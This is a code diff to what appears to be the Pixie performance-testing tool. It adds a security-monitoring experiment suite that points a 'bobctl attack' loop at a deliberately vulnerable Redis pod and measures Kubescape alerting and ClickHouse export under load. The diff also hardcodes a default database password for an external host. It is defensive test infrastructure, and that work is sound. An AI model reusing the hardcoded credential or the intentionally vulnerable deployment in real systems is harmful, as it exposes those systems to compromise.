"infra" + +func KubescapeVectorWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "kubescape-vector", + ActionSelector: SovereignSOCInfraSelector, + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape.rendered.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape.rendered.kube-system.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape-default-rules.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/vector.rendered.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "honey", + }, + }, + }, + }, + } +} + +// RedisVulnerableWorkload deploys the pre-populated Kubescape +// ApplicationProfile and the intentionally vulnerable Redis 7.2.10 pod +// that bobctl-attack targets. Both YAMLs land in the `redis` namespace. +// +// Tagged as `infra` so it deploys BEFORE START_METRIC_RECORDERS. 
The +// redis_events table only registers in Pixie after the PEM observes a +// RESP packet; with MultiTierAppWorkload running in the same selector, +// the api backend's redis cache traffic provides that first packet +// before any metric script probes the table. (Previously a separate +// redis-warmer Deployment served this role, but k6 → api → redis under +// MultiTierAppWorkload drives orders of magnitude more traffic and +// makes the warmer redundant.) +// +// Assumes the target cluster has Kubescape (honey/node-agent) preinstalled +// — the k8ssandra suite has the same "external prerequisite" shape. +func RedisVulnerableWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "redis-vulnerable", + ActionSelector: SovereignSOCInfraSelector, + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + // sbob ApplicationProfiles MUST precede the + // Deployments — kubescape only honours the + // `kubescape.io/user-defined-profile` label if + // the named profile already exists when the pod + // is admitted; otherwise it silently falls back + // to auto-learning and the t0-alerting we're + // trying to enable doesn't happen. See + // feedback_kubescape_empty_profile. + YAMLPaths: []string{ + fmt.Sprintf("%s/redis-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/redis-client-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/redis-vulnerable.yaml", sovereignSOCYAMLRoot), + }, + }, + }, + }, + }, + Healthchecks: redisHealthChecks("redis"), + } +} + +// MultiTierAppWorkload deploys a three-tier HTTP stack into the `redis` +// namespace whose request mix exercises four Pixie protocol decoders +// at the same time (http_events, redis_events, pgsql_events, dns_events): +// +// loadgen (k6) +// │ +// ▼ HTTP /api/item/{id}, /api/event ─→ http_events +// api-backend (Flask + gunicorn × 2 replicas) +// │ │ +// ▼ Redis GET/SETEX/DEL ▼ PostgreSQL SELECT/INSERT +// redis (existing) postgres (new) +// redis_events pgsql_events +// +// `qps` is k6's constant-arrival-rate target; `vus` the steady-state +// worker pool; `maxVUs` the burst cap. The base loadgen-k6.yaml ships +// configured for qps=500 / vus=50 / maxVUs=200 (the 1× profile); higher +// multipliers are wired in via a strategic-merge env patch on the +// loadgen Deployment, so the same three YAMLs serve all load levels. +// Kustomize merges env entries by `name`, replacing the relevant values +// in place without touching API_URL or anything else. +// +// Tagged `infra` so the redis + postgres + http traffic starts BEFORE +// the metric recorders' PxL healthcheck queries Pixie's protocol +// tables — without that ordering, the healthcheck loops on +// `Table 'redis_events' not found`. +func MultiTierAppWorkload(qps, vus, maxVUs int) *pb.WorkloadSpec { + envPatch := fmt.Sprintf(`apiVersion: apps/v1 +kind: Deployment +metadata: + name: loadgen + namespace: redis +spec: + template: + spec: + containers: + - name: k6 + env: + - {name: K6_QPS, value: "%d"} + - {name: K6_VUS, value: "%d"} + - {name: K6_MAX_VUS, value: "%d"} +`, qps, vus, maxVUs) + return &pb.WorkloadSpec{ + Name: "multi-tier-app", + ActionSelector: SovereignSOCInfraSelector, + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + // sbob ApplicationProfiles first — same reasoning + // as RedisVulnerableWorkload: the user-defined- + // profile label only takes effect if the named + // profile already exists at pod-admission time. 
+ // loadgen is intentionally NOT profiled — it + // carries `kubescape.io/ignore: true` because it + // IS the adversary surface for k6 traffic. + YAMLPaths: []string{ + fmt.Sprintf("%s/postgres-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/api-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/postgres.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/api-backend.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/loadgen-k6.yaml", sovereignSOCYAMLRoot), + }, + Patches: []*pb.PatchSpec{ + { + Target: &pb.PatchTarget{ + Kind: "Deployment", + Name: "loadgen", + Namespace: "redis", + }, + YAML: envPatch, + }, + }, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "redis", + }, + }, + }, + }, + } +} + +// BobctlAttackWorkload deploys a Kubernetes Job that runs `bobctl attack` +// against the vulnerable redis deployment in a tight loop for the +// experiment's duration. The Job's init container downloads the bobctl +// binary from the upstream release; the attack suite is mounted from the +// bob-suite-attack ConfigMap. +func BobctlAttackWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "bobctl-attack", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/bob-suite-attack-cm.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/bobctl-attack-job.yaml", sovereignSOCYAMLRoot), + }, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "redis", + }, + }, + }, + }, + } +} + +// redisHealthChecks mirrors HTTPHealthChecks but asserts on Pixie's +// redis_events table instead of http_events. +func redisHealthChecks(namespace string) []*pb.HealthCheck { + checks := []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: namespace, + }, + }, + }, + } + t, err := template.New("").Parse(redisDataInNamespaceScript) + if err != nil { + log.WithError(err).Fatal("failed to parse Redis healthcheck script") + } + buf := &strings.Builder{} + err = t.Execute(buf, &struct { + Namespace string + }{ + Namespace: namespace, + }) + if err != nil { + log.WithError(err).Fatal("failed to execute Redis healthcheck template") + } + checks = append(checks, &pb.HealthCheck{ + CheckType: &pb.HealthCheck_PxL{ + PxL: &pb.PxLHealthCheck{ + Script: buf.String(), + SuccessColumn: "success", + }, + }, + }) + return checks +} + +// SovereignSOCRedisAttackExperiment drives the vulnerable redis deployment +// with a continuous bobctl attack loop while Pixie is running. The +// clickhouse_export PxL script continuously exports a windowed slice of +// redis_events to the forensic ClickHouse cluster; KubescapeNodeAgent and +// ForensicAlertCount track the anomaly side, ProcessStats/Heap/CH operator +// track Pixie and CH health. +// +// exportDSN is the ClickHouse endpoint Kelvin uses for px.export; it MUST +// be reachable from the experiment cluster's network. Pointing this at an +// in-cluster service DNS name of a different cluster will crash Kelvin +// because ClickHouseExportSinkNode::OpenImpl does not catch exceptions +// thrown by the clickhouse-cpp client constructor on DNS failure. +// +// alertsDSN is the ClickHouse endpoint the perf tool reads forensic_db +// alerts from via clickhouse_dsn=. It can be a different cluster/db/user +// from exportDSN. 
A failure here will only error the forensic-alerts +// metric; it will not crash Kelvin. +func SovereignSOCRedisAttackExperiment( + metricPeriod time.Duration, + exportPeriod time.Duration, + exportWindow time.Duration, + exportDSN string, + exportTable string, + alertsDSN string, + alertsTable string, + alertCountWindow time.Duration, + predeployDur time.Duration, + dur time.Duration, + qpsMultiplier int, +) *pb.ExperimentSpec { + vizierSpec := VizierWorkload() + if os.Getenv("SOC_VIZIER_EXISTING") == "1" { + vizierSpec = existingVizierWorkload() + } + // Three-tier load profile. 1× = 500 k6 QPS / 50 preallocated VUs / + // 200 maxVUs (k6's own runtime cap). Each multiplier scales all + // three linearly — VUs > QPS would just sit idle, and maxVUs needs + // to stay above VUs to leave headroom for tail latency. + qps := 500 * qpsMultiplier + vus := 50 * qpsMultiplier + maxVUs := 200 * qpsMultiplier + e := &pb.ExperimentSpec{ + VizierSpec: vizierSpec, + WorkloadSpecs: []*pb.WorkloadSpec{ + // Kubescape + Vector first so the node-agent is running and + // Vector's log pipeline is live before any attack traffic is + // generated. Vector ships node-agent logs to + // forensic_db.kubescape_logs on the external forensic CH. + KubescapeVectorWorkload(), + RedisVulnerableWorkload(), + // Three-tier loadgen → api → (redis + postgres) lights up + // http/redis/pgsql/dns events simultaneously at the chosen + // QPS multiplier. + MultiTierAppWorkload(qps, vus, maxVUs), + BobctlAttackWorkload(), + }, + MetricSpecs: []*pb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the heap query slightly because of known query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseExportLoadMetric(exportPeriod, exportDSN, exportTable, exportTable, exportWindow), + ClickHouseOperatorMetrics(metricPeriod), + KubescapeNodeAgentMetrics(metricPeriod), + ForensicAlertCountMetric(metricPeriod, alertsDSN, alertsTable, alertCountWindow), + }, + RunSpec: &pb.RunSpec{ + Actions: []*pb.ActionSpec{ + { + Type: pb.START_VIZIER, + }, + { + // Deploy kubescape+vector first so the node-agent's + // prometheus listener on :8080 is up before the + // metric recorder pre-flights port-forwards. Without + // this ordering, the recorder errors out at startup. + Type: pb.START_WORKLOADS, + Name: SovereignSOCInfraSelector, + }, + { + Type: pb.START_METRIC_RECORDERS, + }, + { + Type: pb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + // Default selector (empty) catches the redis + + // bobctl-attack workloads. 
+ Type: pb.START_WORKLOADS, + }, + { + Type: pb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: pb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/sovereign-soc", + "workload/redis-attack", + fmt.Sprintf("parameter/export_window/%s", exportWindow), + fmt.Sprintf("parameter/alert_count_window/%s", alertCountWindow), + fmt.Sprintf("parameter/load_multiplier/%dx", qpsMultiplier), + fmt.Sprintf("parameter/k6_qps/%d", qps), + ) + return e +} diff --git a/src/e2e_test/perf_tool/pkg/suites/suites.go b/src/e2e_test/perf_tool/pkg/suites/suites.go index 4d5597ddf04..8116dff871e 100644 --- a/src/e2e_test/perf_tool/pkg/suites/suites.go +++ b/src/e2e_test/perf_tool/pkg/suites/suites.go @@ -20,6 +20,7 @@ package suites import ( "fmt" + "os" "time" pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" @@ -30,15 +31,17 @@ type ExperimentSuite func() map[string]*pb.ExperimentSpec // ExperimentSuiteRegistry contains all the ExperimentSuite, keyed by name. var ExperimentSuiteRegistry = map[string]ExperimentSuite{ - "nightly": nightlyExperimentSuite, - "http-grid": httpGridSuite, - "k8ssandra": k8ssandraExperimentSuite, + "nightly": nightlyExperimentSuite, + "http-grid": httpGridSuite, + "k8ssandra": k8ssandraExperimentSuite, + "clickhouse-exec": clickhouseExecSuite, + "sovereign-soc": sovereignSOCSuite, } func nightlyExperimentSuite() map[string]*pb.ExperimentSpec { defaultMetricPeriod := 30 * time.Second preDur := 5 * time.Minute - dur := 40 * time.Minute + dur := 5 * time.Minute httpNumConns := 100 exps := map[string]*pb.ExperimentSpec{ "http-loadtest/100/100": HTTPLoadTestExperiment(httpNumConns, 100, defaultMetricPeriod, preDur, dur), @@ -73,6 +76,55 @@ func k8ssandraExperimentSuite() map[string]*pb.ExperimentSpec { return exps } +// clickhouseExecSuite covers the two sides of Pixie's ClickHouse integration +// under load: the write/export path and the read/query path. Both experiments +// share the same metric shape (process/heap/clickhouse-operator) so results +// can be compared directly. +// +// The ClickHouse operator metrics are scraped via the prometheus recorder +// named "clickhouse-operator" -- point the CLI at the correct cluster with: +// +// --prom_recorder_override clickhouse-operator=/path/to/kubeconfig:my-ctx +func clickhouseExecSuite() map[string]*pb.ExperimentSpec { + defaultMetricPeriod := 30 * time.Second + preDur := 5 * time.Minute + // preDur := 2 * time.Minute + dur := 20 * time.Minute + // dur := 5 * time.Minute + httpNumConns := 100 + httpTargetRPS := 3000 + + // Tight cadence on the export/read scripts to apply real pressure. 
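On the `--prom_recorder_override` value format shown in the docstring above (`name=<kubeconfig>:<kube-context>`): the sketch below shows how such a value decomposes. It is an illustrative parser, not the CLI's actual implementation; the suite's cadence constants that the preceding comment introduces continue right after the sketch.

```go
package main

import (
	"fmt"
	"strings"
)

// parseOverride splits "<recorder-name>=<kubeconfig-path>:<kube-context>".
// Either the path or the context may be empty — "clickhouse-operator=:k8ss-forensic"
// keeps the default kubeconfig but pins the context. Hypothetical helper;
// the real flag handling lives outside this diff.
func parseOverride(v string) (name, kubeconfig, kubeContext string, err error) {
	name, rest, ok := strings.Cut(v, "=")
	if !ok {
		return "", "", "", fmt.Errorf("missing '=' in override %q", v)
	}
	// Split on the LAST ':' so colons inside the path cannot eat the
	// context. (Assumption: context names never contain ':'.)
	i := strings.LastIndex(rest, ":")
	if i < 0 {
		return "", "", "", fmt.Errorf("missing ':' in override %q", v)
	}
	return name, rest[:i], rest[i+1:], nil
}

func main() {
	n, kc, kctx, _ := parseOverride("clickhouse-operator=:k8ss-forensic")
	fmt.Println(n, kc, kctx) // clickhouse-operator <empty path> k8ss-forensic
}
```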
+	exportPeriod := 5 * time.Second
+	exportWindow := 30 * time.Second
+	readPeriod := 5 * time.Second
+	readWindow := 5 * time.Minute
+
+	clickhouseDSN := "pixie:pixie_password@clickhouse.forensic.austrianopencloudcommunity.org:9000/default"
+	clickhouseTable := "http_events"
+
+	exps := map[string]*pb.ExperimentSpec{
+		"clickhouse-export": ClickHouseExportExperiment(
+			httpNumConns, httpTargetRPS,
+			defaultMetricPeriod,
+			exportPeriod, exportWindow,
+			clickhouseDSN, clickhouseTable,
+			preDur, dur,
+		),
+		"clickhouse-read": ClickHouseReadExperiment(
+			httpNumConns, httpTargetRPS,
+			defaultMetricPeriod,
+			readPeriod, readWindow,
+			clickhouseDSN, clickhouseTable,
+			preDur, dur,
+		),
+	}
+	for _, e := range exps {
+		addTags(e, "suite/clickhouse-exec")
+	}
+	return exps
+}
+
 func httpGridSuite() map[string]*pb.ExperimentSpec {
 	defaultMetricPeriod := 30 * time.Second
 	preDur := 5 * time.Minute
@@ -115,3 +167,88 @@
 	}
 	return exps
 }
+
+// sovereignSOCSuite drives the Sovereign SOC demo workflow (vulnerable
+// Redis 7.2.10 + bobctl attack loop + Kubescape anomaly generation +
+// forensic ClickHouse export) under perf_tool orchestration. Kubescape and
+// Vector are installed (or idempotently re-applied) by the suite's own
+// KubescapeVectorWorkload; the Altinity ClickHouse operator in the
+// `clickhouse` namespace and the forensic ClickHouse endpoint are external
+// prerequisites — the same pre-installed-dependency shape as the k8ssandra
+// suite. Vector tails kubescape logs into forensic_db.kubescape_logs.
+// Point prometheus recorders at the forensic cluster via
+//
+//	--prom_recorder_override clickhouse-operator=<kubeconfig>:<kube-context>
+//	--prom_recorder_override kubescape-node-agent=<kubeconfig>:<kube-context>
+func sovereignSOCSuite() map[string]*pb.ExperimentSpec {
+	defaultMetricPeriod := 30 * time.Second
+	preDur := 2 * time.Minute
+	dur := 20 * time.Minute
+
+	exportPeriod := 5 * time.Second
+	exportWindow := 30 * time.Second
+	alertCountWindow := 1 * time.Minute
+
+	// Both DSNs target the same external forensic endpoint with the same
+	// pixie user (which has been granted SHOW/SELECT/INSERT on forensic_db.*
+	// out-of-band). The endpoint MUST be reachable from the experiment
+	// cluster's network — the clickhouse-cpp client will crash Kelvin with
+	// SIGSEGV if DNS fails (see ClickHouseExportSinkNode TODO).
+	// - exportDSN: <host>/default — where Pixie's CH export sink writes.
+	// - alertsDSN: <host>/forensic_db — where Vector lands Kubescape alerts.
+	//   forensic_db must be pre-created via soc/tree/clickhouse-lab/schema.sql;
+	//   this suite does not bootstrap CH schemas (CH is shared infra).
+	//
+	// SOC_CH_HOST / SOC_CH_CREDS override the defaults for local-cluster runs
+	// where the forensic CH is in the same k3s as the experiment workloads
+	// (perf_tool's local-ci.sh phase 9 sets these to a NodePort + the local
+	// `pixie` user it creates).
+	clickhouseHost := os.Getenv("SOC_CH_HOST")
+	if clickhouseHost == "" {
+		clickhouseHost = "clickhouse.forensic.austrianopencloudcommunity.org:9000"
+	}
+	clickhouseCreds := os.Getenv("SOC_CH_CREDS")
+	if clickhouseCreds == "" {
+		clickhouseCreds = "pixie:pixie_password"
+	}
+	exportDSN := fmt.Sprintf("%s@%s/default", clickhouseCreds, clickhouseHost)
+	alertsDSN := fmt.Sprintf("%s@%s/forensic_db", clickhouseCreds, clickhouseHost)
+	exportTable := "redis_events"
+	// Vector writes raw kubescape alerts to forensic_db.kubescape_logs (see
+	// helm-rendered/vector-values.yaml kubescape_clickhouse sink). A separate
+	// forensic_db.alerts materialized view / projection exists in some demo
+	// variants but is not populated by the stock Vector config.
+	alertsTable := "kubescape_logs"
+
+	// Load sweep. The MultiTierAppWorkload's k6 loadgen scales linearly
+	// with the multiplier: 1× = 500 QPS, 32× = 16 000 QPS hitting the API
+	// (which fans out to redis + postgres at correlated rates). Run a
+	// single multiplier via `--experiment_name=redis-attack-<N>x`, or
+	// run them all sequentially to characterize Pixie + CH + adaptive
+	// operator headroom across the sweep.
+	//
+	// Range starts at 2× because the 1×–16× sweep on 2026-05-14 showed
+	// PEM peaking at only ~400 % CPU and CH at 1.5 GB / 16 GB — the
+	// 32-core / 64 GB VM was nowhere near the knee. 64× ≈ 32 k QPS
+	// stretches the loadgen → API → redis + postgres → Pixie path
+	// hard enough to either saturate something or expose the next
+	// bottleneck (currently suspect: redis-server's single-thread
+	// 1-CPU limit, gunicorn worker count, or k6 self-throttling).
+	loadMultipliers := []int{2, 4, 8, 16, 32, 64}
+	exps := map[string]*pb.ExperimentSpec{}
+	for _, m := range loadMultipliers {
+		name := fmt.Sprintf("redis-attack-%dx", m)
+		exps[name] = SovereignSOCRedisAttackExperiment(
+			defaultMetricPeriod,
+			exportPeriod, exportWindow,
+			exportDSN, exportTable,
+			alertsDSN, alertsTable,
+			alertCountWindow,
+			preDur, dur,
+			m,
+		)
+	}
+	for _, e := range exps {
+		addTags(e, "suite/sovereign-soc")
+	}
+	return exps
+}
diff --git a/src/e2e_test/perf_tool/pkg/suites/workloads.go b/src/e2e_test/perf_tool/pkg/suites/workloads.go
index e0679e5cfb8..dd91bc02715 100644
--- a/src/e2e_test/perf_tool/pkg/suites/workloads.go
+++ b/src/e2e_test/perf_tool/pkg/suites/workloads.go
@@ -30,6 +30,32 @@ import (
 	pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb"
 )
 
+// VizierReleaseWorkload returns the workload spec to deploy a released version of Vizier via `px deploy`.
+// This skips the skaffold build step, using pre-built images from the Pixie release.
+func VizierReleaseWorkload() *pb.WorkloadSpec {
+	return &pb.WorkloadSpec{
+		Name: "vizier",
+		DeploySteps: []*pb.DeployStep{
+			{
+				DeployType: &pb.DeployStep_Px{
+					Px: &pb.PxCLIDeploy{
+						Args: []string{
+							"deploy",
+						},
+						SetClusterID: true,
+						Namespaces: []string{
+							"pl",
+							"px-operator",
+							"olm",
+						},
+					},
+				},
+			},
+		},
+		Healthchecks: VizierHealthChecks(),
+	}
+}
+
 // VizierWorkload returns the workload spec to deploy Vizier.
 func VizierWorkload() *pb.WorkloadSpec {
 	return &pb.WorkloadSpec{
@@ -189,6 +215,36 @@ func OnlineBoutiqueWorkload() *pb.WorkloadSpec {
 	}
 }
 
+// ClickHouseReadLoadWorkload deploys the (future) skaffold application that
+// generates sustained ClickHouse read traffic alongside the Pixie read
+// experiment. The skaffold path below is a placeholder; wire up the real
+// application once it exists in the tree.
+func ClickHouseReadLoadWorkload() *pb.WorkloadSpec {
+	return &pb.WorkloadSpec{
+		Name: "clickhouse-read-load",
+		DeploySteps: []*pb.DeployStep{
+			{
+				DeployType: &pb.DeployStep_Skaffold{
+					Skaffold: &pb.SkaffoldDeploy{
+						// TODO(ddelnano): replace with the real skaffold path once
+						// the ClickHouse read-load generator app lands.
+						SkaffoldPath: "src/e2e_test/clickhouse_read_load/skaffold.yaml",
+					},
+				},
+			},
+		},
+		Healthchecks: []*pb.HealthCheck{
+			{
+				CheckType: &pb.HealthCheck_K8S{
+					K8S: &pb.K8SPodsReadyCheck{
+						Namespace: "px-clickhouse-read-load",
+					},
+				},
+			},
+		},
+	}
+}
+
 // KafkaWorkload returns the WorkloadSpec to deploy the kafka demo.
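On the strategic-merge env patch that MultiTierAppWorkload (above) applies to the loadgen Deployment: kustomize-style merge keys container env entries by `name`. Below is a simplified Go model of that rule — the real implementation lives in k8s.io/apimachinery, and this sketch only makes the merge semantics concrete; KafkaWorkload's unchanged body follows it.

```go
package kustomizemodel // illustrative model only; not part of this diff

// envVar mirrors the {name, value} entries in a container's env list.
type envVar struct{ Name, Value string }

// mergeEnvByName applies the rule the loadgen patch relies on: patch entries
// replace base entries with the same Name in place; everything else (e.g.
// API_URL) is untouched, and unmatched patch entries are appended.
func mergeEnvByName(base, patch []envVar) []envVar {
	idx := make(map[string]int, len(base))
	for i, e := range base {
		idx[e.Name] = i
	}
	out := append([]envVar(nil), base...)
	for _, p := range patch {
		if i, ok := idx[p.Name]; ok {
			out[i] = p
			continue
		}
		out = append(out, p)
	}
	return out
}
```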
 func KafkaWorkload() *pb.WorkloadSpec {
 	return &pb.WorkloadSpec{
diff --git a/src/e2e_test/perf_tool/ui/index.html b/src/e2e_test/perf_tool/ui/index.html
new file mode 100644
index 00000000000..e57432b207e
--- /dev/null
+++ b/src/e2e_test/perf_tool/ui/index.html
@@ -0,0 +1,1215 @@
[The 1,215 added lines are a self-contained "Pixie Perf Tool Dashboard" page whose HTML/JS markup was lost to tag-stripping in this extraction. Recoverable content: a header titled "Pixie Perf Tool Dashboard" with the tagline "DuckDB WASM + Parquet", an "Initializing DuckDB..." status banner, and a "Data Source" panel that loads results_*.parquet and spec.parquet files either via drag-and-drop ("Drop parquet files here or click to browse") or ("OR") from a GCS bucket, with the caveat "Bucket must be publicly readable or have CORS configured."]
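Because the dashboard's engine is DuckDB over the same parquet artifacts, the files it consumes can be inspected locally with identical SQL. A sketch assuming the community github.com/marcboeker/go-duckdb driver (an assumption — the dashboard itself runs DuckDB-WASM in the browser):

```go
package main

import (
	"database/sql"
	"fmt"
	"log"

	_ "github.com/marcboeker/go-duckdb" // registers the "duckdb" driver
)

func main() {
	// Empty DSN = in-memory DuckDB, mirroring the WASM build's default.
	db, err := sql.Open("duckdb", "")
	if err != nil {
		log.Fatal(err)
	}
	defer db.Close()

	// read_parquet() accepts the same glob the UI's drop target expects.
	var n int64
	row := db.QueryRow(`SELECT count(*) FROM read_parquet('results_*.parquet')`)
	if err := row.Scan(&n); err != nil {
		log.Fatal(err)
	}
	fmt.Printf("result rows: %d\n", n)
}
```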
diff --git a/src/e2e_test/protocol_loadtest/skaffold_client.yaml b/src/e2e_test/protocol_loadtest/skaffold_client.yaml
index 3939defe219..a85de725773 100644
--- a/src/e2e_test/protocol_loadtest/skaffold_client.yaml
+++ b/src/e2e_test/protocol_loadtest/skaffold_client.yaml
@@ -7,6 +7,8 @@ build:
     context: .
     bazel:
       target: //src/e2e_test/protocol_loadtest/client:protocol_loadtest_client_image.tar
+      args:
+        - --config=x86_64_sysroot
   tagPolicy:
     dateTime: {}
   local:
diff --git a/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml b/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml
index f6d25ba9ed6..87b38a59ee1 100644
--- a/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml
+++ b/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml
@@ -7,6 +7,8 @@ build:
     context: .
     bazel:
       target: //src/e2e_test/protocol_loadtest:protocol_loadtest_server_image.tar
+      args:
+        - --config=x86_64_sysroot
   tagPolicy:
     dateTime: {}
   local:
diff --git a/src/utils/shared/k8s/apply.go b/src/utils/shared/k8s/apply.go
index c25858ce6d7..0a5e4100dea 100644
--- a/src/utils/shared/k8s/apply.go
+++ b/src/utils/shared/k8s/apply.go
@@ -30,6 +30,7 @@ import (
 	"strings"
 
 	log "github.com/sirupsen/logrus"
+	"k8s.io/apimachinery/pkg/api/meta"
 	k8serrors "k8s.io/apimachinery/pkg/api/errors"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
 	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
@@ -235,8 +236,15 @@ func ApplyResources(clientset kubernetes.Interface, config *rest.Config, resourc
 	}
 	nsRes := res.Namespace(objNS)
 
+	// Use the rest mapping's scope to decide between cluster- and
+	// namespace-scoped client paths. The previous implementation kept a
+	// hardcoded allowlist of cluster-scoped kinds and tried to namespace-
+	// qualify everything else, which produced "the server could not find
+	// the requested resource" 404s for any cluster-scoped resource not
+	// in the list (e.g. APIService, PriorityClass, or cluster-scoped CRs
+	// like RuntimeRuleAlertBinding).
 	createRes := nsRes
-	if k8sRes == "validatingwebhookconfigurations" || k8sRes == "mutatingwebhookconfigurations" || k8sRes == "namespaces" || k8sRes == "configmap" || k8sRes == "clusterrolebindings" || k8sRes == "clusterroles" || k8sRes == "customresourcedefinitions" {
+	if mapping.Scope != nil && mapping.Scope.Name() == meta.RESTScopeNameRoot {
 		createRes = res
 	}
diff --git a/src/utils/shared/k8s/delete.go b/src/utils/shared/k8s/delete.go
index 3adb2c8b986..689e0f8be54 100644
--- a/src/utils/shared/k8s/delete.go
+++ b/src/utils/shared/k8s/delete.go
@@ -29,7 +29,9 @@ import (
 	"k8s.io/apimachinery/pkg/api/errors"
 	"k8s.io/apimachinery/pkg/api/meta"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
 	"k8s.io/apimachinery/pkg/runtime"
+	"k8s.io/apimachinery/pkg/runtime/schema"
 	"k8s.io/apimachinery/pkg/util/sets"
 	"k8s.io/cli-runtime/pkg/genericclioptions"
 	"k8s.io/cli-runtime/pkg/printers"
@@ -44,6 +46,12 @@ import (
 	cmdwait "k8s.io/kubectl/pkg/cmd/wait"
 )
 
+var apiServiceGVR = schema.GroupVersionResource{
+	Group:    "apiregistration.k8s.io",
+	Version:  "v1",
+	Resource: "apiservices",
+}
+
 // ObjectDeleter has methods to delete K8s objects and wait for them. This code is adopted from `kubectl delete`.
 type ObjectDeleter struct {
 	Namespace string
@@ -110,6 +118,32 @@ func (o *ObjectDeleter) DeleteNamespace() error {
 	return err
 }
 
+// getAggregatedGroupVersions returns the set of group/versions that are served
+// by an aggregated APIService (spec.service is non-nil).
Resources in those +// groups are skipped during cluster-wide deletion sweeps because aggregated +// servers frequently advertise the delete verb on read-only virtual resources +// and fail the call with "operation not supported". +func (o *ObjectDeleter) getAggregatedGroupVersions() (sets.String, error) { + out := sets.NewString() + list, err := o.dynamicClient.Resource(apiServiceGVR).List(context.TODO(), metav1.ListOptions{}) + if err != nil { + if errors.IsNotFound(err) || meta.IsNoMatchError(err) { + return out, nil + } + return nil, err + } + for _, item := range list.Items { + svc, found, err := unstructured.NestedMap(item.Object, "spec", "service") + if err != nil || !found || svc == nil { + continue + } + group, _, _ := unstructured.NestedString(item.Object, "spec", "group") + version, _, _ := unstructured.NestedString(item.Object, "spec", "version") + out.Insert(schema.GroupVersion{Group: group, Version: version}.String()) + } + return out, nil +} + func (o *ObjectDeleter) getDeletableResourceTypes() ([]string, error) { discoveryClient, err := o.rcg.ToDiscoveryClient() if err != nil { @@ -121,11 +155,19 @@ func (o *ObjectDeleter) getDeletableResourceTypes() ([]string, error) { return nil, err } + aggregated, err := o.getAggregatedGroupVersions() + if err != nil { + return nil, err + } + resources := []string{} for _, list := range lists { if len(list.APIResources) == 0 { continue } + if aggregated.Has(list.GroupVersion) { + continue + } for _, resource := range list.APIResources { if len(resource.Verbs) == 0 { @@ -145,6 +187,9 @@ func (o *ObjectDeleter) DeleteByLabel(selector string, resourceKinds ...string) if err := o.initRestClientGetter(); err != nil { return 0, err } + if err := o.initDynamicClient(); err != nil { + return 0, err + } b := resource.NewBuilder(o.rcg) if len(resourceKinds) == 0 { @@ -169,9 +214,6 @@ func (o *ObjectDeleter) DeleteByLabel(selector string, resourceKinds ...string) if err != nil { return 0, err } - if err := o.initDynamicClient(); err != nil { - return 0, err - } return o.runDelete(r) } diff --git a/src/vizier/funcs/md_udtfs/md_udtfs_impl.h b/src/vizier/funcs/md_udtfs/md_udtfs_impl.h index ff5fdcbe6c2..9b1d9936df3 100644 --- a/src/vizier/funcs/md_udtfs/md_udtfs_impl.h +++ b/src/vizier/funcs/md_udtfs/md_udtfs_impl.h @@ -1145,12 +1145,17 @@ class 